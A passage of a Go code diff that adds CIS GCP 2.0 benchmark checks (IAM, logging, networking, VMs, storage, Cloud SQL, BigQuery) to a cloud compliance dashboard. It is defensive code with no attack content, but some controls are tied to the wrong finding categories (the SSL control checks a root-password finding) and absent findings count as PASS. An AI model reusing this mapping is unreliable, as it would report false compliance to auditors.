(m *ComplianceDashboardModule) checkCIS_1_5_SeperationOfDuties(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure separation of duties is enforced", + Description: "Users should not have both Service Account Admin and Service Account User roles", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Implement separation of duties by assigning roles to different principals", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_6_KMSRoles(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure KMS encryption and decryption roles are separated", + Description: "KMS admin should not have encryption/decryption access", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Separate KMS administration from encryption/decryption operations", + } + + if findings, ok := m.sccFindings["KMS_ROLE_SEPARATION"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_7_SAKeyRotation(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure service account keys are rotated within 90 days", + Description: "Service account keys should be rotated regularly", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Implement key rotation policy or use short-lived credentials", + } + + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_KEY_NOT_ROTATED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d service account keys older than 90 days", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_8_UserManagedKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure user-managed service account keys are reviewed", + Description: "All user-managed keys should be inventoried and reviewed", + Severity: "LOW", + Status: "MANUAL", + Remediation: "Document and regularly review all user-managed service account keys", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_9_CloudKMSSeparation(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud KMS cryptokeys are not anonymously or publicly accessible", + Description: "KMS keys should not be accessible to allUsers or allAuthenticatedUsers", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove public access from Cloud KMS keys", + } + + if findings, ok := m.sccFindings["KMS_KEY_PUBLIC"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d publicly accessible KMS keys", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "kms-key", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_10_APIKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure API keys are restricted to only APIs and hosts that need them", + Description: "API keys should have appropriate restrictions", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Apply API and host restrictions to all API keys", + } + + if findings, ok := m.sccFindings["API_KEY_NOT_RESTRICTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d unrestricted API keys", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 2: Logging and Monitoring Controls +func (m *ComplianceDashboardModule) checkCIS_2_1_CloudAuditLogging(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud Audit Logging is configured properly", + Description: "Cloud Audit Logs should be enabled for all services", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Enable Data Access audit logs for all services", + } + + if findings, ok := m.sccFindings["AUDIT_LOGGING_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d services with disabled audit logging", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_2_LogSinks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts exist for audit configuration changes", + Description: "Alerts should be configured for audit configuration changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create log-based metrics and alerts for audit config changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_3_RetentionPolicy(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log bucket has retention policy with appropriate duration", + Description: "Log buckets should have retention policies configured", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Configure retention policies on all log storage buckets", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_4_ProjectOwnership(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for project ownership changes", + Description: "Alerts for project ownership changes should be configured", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for project ownership assignment changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_5_AuditConfigChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for audit configuration changes", + Description: "Monitor changes to audit configurations", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create log-based metrics for audit configuration changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_6_SQLInstanceChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for SQL instance configuration changes", + Description: "Monitor Cloud SQL instance configuration changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for Cloud SQL configuration changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_7_NetworkChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC network changes", + Description: "Monitor VPC network creation, deletion, and modifications", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC network changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_8_RouteChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC route changes", + Description: "Monitor VPC route modifications", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC route changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_9_FirewallChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for firewall rule changes", + Description: "Monitor firewall rule creation, modification, and deletion", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for firewall rule changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_10_VPCChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC network firewall changes", + Description: "Monitor VPC firewall changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC firewall changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_11_SQLServerAccessChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.11", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for Cloud SQL Server access changes", + Description: "Monitor Cloud SQL authorization changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for Cloud SQL authorization modifications", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 3: Networking Controls +func (m *ComplianceDashboardModule) checkCIS_3_1_DefaultNetwork(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure default network does not exist", + Description: "The default network should be deleted as it has overly permissive firewall rules", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Delete the default network and create custom VPC networks", + } + + if findings, ok := m.sccFindings["DEFAULT_NETWORK"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d projects with default network", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "vpc-network", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_2_LegacyNetworks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure legacy networks do not exist", + Description: "Legacy networks lack granular subnet control and should not be used", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Migrate from legacy networks to VPC networks", + } + + if findings, ok := m.sccFindings["LEGACY_NETWORK"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_3_DNSSEC(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure DNSSEC is enabled for Cloud DNS", + Description: "DNSSEC protects against DNS spoofing attacks", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable DNSSEC for all Cloud DNS managed zones", + } + + if findings, ok := m.sccFindings["DNSSEC_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_4_RSASHA1(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure RSASHA1 is not used for zone-signing and key-signing", + Description: "RSASHA1 is considered weak for DNSSEC", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Use RSASHA256 or ECDSAP256SHA256 for DNSSEC", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_5_RDPAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure RDP access is restricted from the Internet", + Description: "RDP (port 3389) should not be open to 0.0.0.0/0", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Restrict RDP access to specific IP ranges", + } + + if findings, ok := m.sccFindings["OPEN_RDP_PORT"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d firewall rules allowing RDP from internet", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "firewall-rule", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_6_SSHAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure SSH access is restricted from the Internet", + Description: "SSH (port 22) should not be open to 0.0.0.0/0", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Restrict SSH access to specific IP ranges or use IAP", + } + + if findings, ok := m.sccFindings["OPEN_SSH_PORT"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d firewall rules allowing SSH from internet", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "firewall-rule", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_7_FlowLogs(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VPC Flow Logs is enabled for every subnet", + Description: "VPC Flow Logs provide network traffic visibility", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable VPC Flow Logs on all subnets", + } + + if findings, ok := m.sccFindings["FLOW_LOGS_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_8_SSLPolicy(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure SSL policies use secure TLS versions", + Description: "SSL policies should require TLS 1.2 or higher", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Update SSL policies to require TLS 1.2+", + } + + if findings, ok := m.sccFindings["WEAK_SSL_POLICY"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_9_FirewallLogging(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure firewall rule logging is enabled", + Description: "Firewall rule logging provides audit trail for network access", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable logging on all firewall rules", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_10_VPCNetworkPeering(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VPC network peering is properly configured", + Description: "Review VPC peering for appropriate trust relationships", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Review and document all VPC peering relationships", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 4: Virtual Machine Controls +func (m *ComplianceDashboardModule) checkCIS_4_1_DefaultServiceAccount(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure default Compute Engine service account is not used", + Description: "VMs should use custom service accounts with minimal permissions", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Create custom service accounts for compute instances", + } + + if findings, ok := m.sccFindings["DEFAULT_SERVICE_ACCOUNT"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d VMs using default service account", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "compute-instance", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_2_BlockProjectWideSSH(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure block project-wide SSH keys is enabled", + Description: "Block project-wide SSH keys to enforce instance-level access control", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable 'Block project-wide SSH keys' on all instances", + } + + if findings, ok := m.sccFindings["PROJECT_WIDE_SSH_KEYS_ALLOWED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_3_OSLogin(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure OS Login is enabled", + Description: "OS Login provides centralized SSH access management via IAM", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable OS Login at project or instance level", + } + + if findings, ok := m.sccFindings["OS_LOGIN_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_4_SerialPortDisabled(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure serial port access is disabled", + Description: "Serial port access should be disabled for security", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Disable serial port access on all instances", + } + + if findings, ok := m.sccFindings["SERIAL_PORT_ENABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_5_IPForwarding(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure IP forwarding is disabled unless required", + Description: "IP forwarding should only be enabled on NAT/gateway instances", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Disable IP forwarding on instances that don't require it", + } + + if findings, ok := m.sccFindings["IP_FORWARDING_ENABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_6_PublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VMs do not have public IP addresses", + Description: "VMs should use private IPs and access internet via NAT", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Remove public IPs and use Cloud NAT for internet access", + } + + if findings, ok := m.sccFindings["PUBLIC_IP_ADDRESS"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d VMs with public IP addresses", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_7_ShieldedVM(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Shielded VM is enabled", + Description: "Shielded VMs provide verifiable integrity and boot security", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable Shielded VM features on all instances", + } + + if findings, ok := m.sccFindings["SHIELDED_VM_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_8_ComputeEncryption(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Compute Engine disks are encrypted with CMEK", + Description: "Use Customer-Managed Encryption Keys for disk encryption", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CMEK encryption for all Compute Engine disks", + } + + if findings, ok := m.sccFindings["DISK_CSEK_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_9_ConfidentialComputing(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.9", + Framework: "CIS-GCP-2.0", + ControlName: "Consider enabling Confidential Computing for sensitive workloads", + Description: "Confidential VMs encrypt data in use", + Severity: "LOW", + Status: "MANUAL", + Remediation: "Evaluate Confidential Computing for sensitive workloads", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 5: Storage Controls +func (m *ComplianceDashboardModule) checkCIS_5_1_UniformBucketAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-5.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure uniform bucket-level access is enabled", + Description: "Uniform bucket-level access simplifies and secures IAM permissions", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable uniform bucket-level access on all buckets", + } + + if findings, ok := m.sccFindings["BUCKET_IAM_NOT_MONITORED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_5_2_PublicBuckets(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-5.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud Storage buckets are not anonymously or publicly accessible", + Description: "Storage buckets should not allow public access", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove allUsers and allAuthenticatedUsers from bucket IAM", + } + + publicFindings := []string{} + for category, findings := range m.sccFindings { + if strings.Contains(strings.ToLower(category), "public_bucket") || + strings.Contains(strings.ToLower(category), "bucket_public") { + publicFindings = append(publicFindings, findings...) + } + } + + if len(publicFindings) > 0 { + control.Status = "FAIL" + control.FailCount = len(publicFindings) + control.Details = fmt.Sprintf("Found %d publicly accessible buckets", len(publicFindings)) + + for _, resource := range publicFindings { + m.addFailure(control, resource, "storage-bucket", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 6: Cloud SQL Controls +func (m *ComplianceDashboardModule) checkCIS_6_1_SQLPublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL instances do not have public IPs", + Description: "Cloud SQL should use private IP only", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Configure Cloud SQL to use private IP only", + } + + if findings, ok := m.sccFindings["SQL_PUBLIC_IP"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d Cloud SQL instances with public IP", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "cloudsql-instance", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_2_SQLAuthorizedNetworks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL authorized networks do not include 0.0.0.0/0", + Description: "Restrict authorized networks to specific IP ranges", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove 0.0.0.0/0 from authorized networks", + } + + if findings, ok := m.sccFindings["SQL_WORLD_READABLE"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_3_SQLSSLRequired(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL requires SSL connections", + Description: "SSL should be required for all database connections", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Enable 'Require SSL' for Cloud SQL instances", + } + + if findings, ok := m.sccFindings["SQL_NO_ROOT_PASSWORD"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_4_SQLNoPublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL database instances are configured with automated backups", + Description: "Automated backups ensure data recovery capability", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable automated backups for Cloud SQL instances", + } + + if findings, ok := m.sccFindings["SQL_BACKUP_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_5_SQLBackups(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL instances are using the latest major version", + Description: "Use latest major database version for security updates", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Upgrade Cloud SQL instances to latest major version", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_6_SQLContainedDB(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure contained database authentication is off for SQL Server", + Description: "Disable contained database authentication for SQL Server", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Set 'contained database authentication' flag to 'off'", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_7_SQLCrossDBAOwnership(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure cross db ownership chaining is off for SQL Server", + Description: "Disable cross db ownership chaining for SQL Server", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Set 'cross db ownership chaining' flag to 'off'", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 7: BigQuery Controls +func (m *ComplianceDashboardModule) checkCIS_7_1_BigQueryCMEK(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-7.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery datasets are encrypted with CMEK", + Description: "Use Customer-Managed Encryption Keys for BigQuery", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CMEK encryption for BigQuery datasets", + } + + if findings, ok := m.sccFindings["BIGQUERY_TABLE_CMEK_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_7_2_BigQueryTableCMEK(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-7.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery tables are encrypted with CMEK", + Description: "Use Customer-Managed Encryption Keys for BigQuery tables", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CMEK encryption for BigQuery tables", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_7_3_BigQueryDatasetPublic(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-7.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure BigQuery datasets are not publicly accessible", + Description: "BigQuery datasets should not allow allUsers or allAuthenticatedUsers", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove public access from BigQuery datasets", + } + + if findings, ok := 